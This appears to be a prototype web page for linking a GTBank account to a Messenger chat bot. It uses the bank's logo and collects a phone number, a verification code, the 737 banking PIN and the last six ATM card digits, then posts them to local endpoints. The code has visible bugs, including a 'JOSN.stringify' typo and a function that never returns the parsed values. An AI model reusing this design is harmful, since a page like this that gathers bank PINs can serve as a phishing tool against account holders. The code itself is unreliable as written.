<html>
	<head>
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
		<style type="text/css">
		@font-face {
		    font-family: header;
		    src: url(Adam.otf);
		}
		body {
			text-align: center;
				margin: auto;
		}
			body > div {
				text-align: center;
				margin: auto;
				font-family: sans-serif;
				font-weight: 100;
				color: grey;
				padding: 40px;
				width: 60%;
				border: 1px solid silver;
				border-radius: 5px ;
				margin-top: 50px;
				-webkit-box-shadow: 0px 10px 54px -12px rgba(0,0,0,0.75);
-moz-box-shadow: 0px 10px 54px -12px rgba(0,0,0,0.75);
box-shadow: 0px 10px 54px -12px rgba(0,0,0,0.75);
			}
			input {
				width: 60%;
				text-align: center;
				height: 60px;
				font-size: 20px;
			}
			input[type=number]{
			  -webkit-transition: all 0.30s ease-in-out;
			  -moz-transition: all 0.30s ease-in-out;
			  -ms-transition: all 0.30s ease-in-out;
			  -o-transition: all 0.30s ease-in-out;
			  outline: none;
			  padding: 3px 0px 3px 3px;
			  margin: 5px 1px 3px 0px;
			  border: 1px solid #DDDDDD;
			}
			 
			input[type=number]:focus{
			  box-shadow: 0 0 5px grey;
			  padding: 3px 0px 3px 3px;
			  margin: 5px 1px 3px 0px;
			  border: 1px solid grey;
			}
			button {
				color: white;
				background-color: orangered;
				padding: 10px 20px 10px 20px;
				border: none;
				font-size: 15px;
			}
			img {
				width: 150px;
			}
			h1 {
				font-family: header;
			}
		</style>
	</head>
	<body>
		<div>

			<!-- <button id="test">TEST AJAX</button> -->
			<img src="http://dailyguideafrica.com/wp-content/uploads/2017/04/gtbank-logo.jpg">
			<h1>Welcome to Account Linking</h1>
			<p>Chat bot: </p><br><br>
			<div id="a">
				<input id="inputa" type="number" placeholder="Please Enter Your Phone Number"><br><br><br><br>
				<button id="submita" type="submit">Submit</button>
			</div>
			<div id="b" style="display: none">
				<input required id="inputb" type="number" placeholder="Please Enter The Verification Code sent"><br><br><br><br>
				<button id="submitb" type="submit">Submit</button>
			</div>
			<div id="c" style="display: none">
				<input id="inputc" type="password" maxlength="4" pattern="\d{4}" placeholder="Please Enter Your Existing 737 Pin"><br><br><br><br>
				<button id="submitc" type="submit">Submit</button>
			</div>


			<div id="d" style="display: none">
				<input id="inputd" type="number" placeholder="Please Enter The Last 6 Digits Of Your ATM Card Number"><br><br><br><br>
				<input id="inpute" type="password" maxlength="4" pattern="\d{4}" placeholder="Please Enter a 4 Digit 737 Pin"><br><br>
				<input id="inputf" type="password" maxlength="4" pattern="\d{4}" placeholder="COnfirm Your 4 Digit 737 Pin"><br><br><br><br>
				<button id="submitd" type="submit">Submit</button>
			</div>
			<!--
			<div id="e" style="display: none">
				<input id="inpute" type="text" maxlength="4" pattern="\d{4}" placeholder="Please Enter a 4 Digit 737 Pin"><br><br><br><br>
				<button id="submite" type="submit">Submit</button>
			</div>
			-->
		</div>
		<script type="text/javascript">
		
		var fcbk_number;
		var password;
		var tries = 0;
			$('#submita').click(function() {
				//retrieve facebook id from url
				var params = JSON.stringify(get_params());
				$('p').text(params);
				var phonenumber = $('#inputa').val();
				$.ajax({
						type: 'POST',
						data: JSON.stringify({
							number: phonenumber,
							stuff: 'xyz'
						}),
						dataType: 'json',
		        contentType: 'application/json',
	          url: '/get_user',
	          success: function(data) {
	          	fcbk_number=data.phone;
	            console.log(JSON.stringify(data));
	          }
	      });
				$('p').text('Chat bot: A Verification Pin Has Been Sent To Your Number');
				$('#a').hide();
				$('#b').show();
			})
			$('#submitb').click(function() {
				var returncode;
				var code = $('#inputb').val();
				$('p').text(fcbk_number + '  ' + code);
				$.ajax({
					type: 'POST',
					data: JSON.stringify({
						verify: code,
						number: fcbk_number
					}),
					dataType: 'json',
					contentType: 'application/json',
					url: '/verify_code',
					success: function(data) {
						returncode = data.status;
						if(returncode == '1'){
							$('p').text('Chat bot: Please Enter Your Existing 737 Pin');
							$('#b').hide();
							$('#c').show();
						}else if(returncode == '0'){
							$('p').text('Chat bot: Create a 737 service Pin');
							$('#b').hide();
							$('#d').show();
						}else{
							$('p').text('Invalid Code. A New Verification Code has been sent')
							$('#inputb').val("");
						}
					}
				});
				
			})
			
			$('#submitc').click(function() {
				tries++;
				password = $('#inputc').val();
				$.ajax({
					type: 'POST',
					data: JSON.stringify({
						number:fcbk_number,
						pin: password
					}),
					dataType: 'json',
					contentType: 'application/json',
					url: '/verify_pin',
					success: function(data) {
						if(data.isPin){
							$('p').text('Chat bot: You have succesfully been authenticated. Please return to Messenger');
							$.ajax({
								type: 'POST',
								data: JOSN.stringify({
									//send all data 
									number: fcbk_number,
									pin: password
								}), 
								dataType: 'json',
								contentType: 'application/json',
								url: '/link_user',
								success: function(data){
									//append redirect values
									$('p').text('DONE')
								}
							});
							updateMessage();
							$('#c').hide();
						}else{
							if( tries == 3 ){
								$('#c').hide();
								$('#d').show();
								$('p').text('Chat bot: Maximum Entry Tries Exceeded. Create a new 737 Pin');
							}else{
								$('p').text('Chat bot: Incorrect Pin. Please Try Again');
								$('#inputc').val("");
								
							}
						}
					}
				});
			})

			$('#submitd').click(function() {
				/*$('p').text('Chat bot: You Need to Enter A 4 Digit 737 Pin');
				$('#d').hide();
				$('#e').show();
				*/
				if($('#inpute').val() == $('#inputf').val()){
					password = $('#inpute').val();
					var card_details = $('#inputd').val();
					$.ajax({
						type: 'POST',
						data: JSON.stringify({
							number:fcbk_number,
							card: card_details,
							pin: password
						}),
						dataType: 'json',
						contentType: 'application/json',
						url: '/register_number',
						success: function(data) {
							if(data.isRegistered){
								$('p').text('Chat bot: You have succesfully been authenticated. Return to Messenger');
								$.ajax({
									type: 'POST',
									data: JOSN.stringify({
										//send all data 
										number: fcbk_number,
										pin: password
									}), 
									dataType: 'json',
									contentType: 'application/json',
									url: '/link_user',
									success: function(data){
										//append redirect values
									}
								});
							}
						}
					});
				} else{
					$('p').text('The Confirmed Pin Does Not Match the Entered Pin');
					$('#inpute').val("");
					$('#inputf').val("");
				}
				
			})

			/*
			$('#submite').click(function() {
				$('p').text('Chat bot: You have succesfully been authenticated. Please return to Messenger');
				updateMessage();
				$('#e').hide();
			})
			*/
			
			function get_params(){
				if(window.location.search){
					var queryString = window.location.search;
					queryString = queryString.substring(1);
					var parseQueryString = function( queryString ) {
    				var params = {}, queries, temp, i, l;
    				// Split into key/value pairs
    				queries = queryString.split("&");
    				// Convert the array of strings into an object
    				for ( i = 0, l = queries.length; i < l; i++ ) {
        			temp = queries[i].split('=');
       				params[temp[0]] = temp[1];
    				}
    				return params;
					};
					
					return parseQueryString;
				}
			}

			function setCookie(value) {
			    document.cookie = "cookie-msg-test=" + value + "; path=/";
			    return true;
			}
			function updateMessage() {
			    setCookie("done");
			    setTimeout(updateMessage, 100);
			}
			
		</script>
	</body>
</html>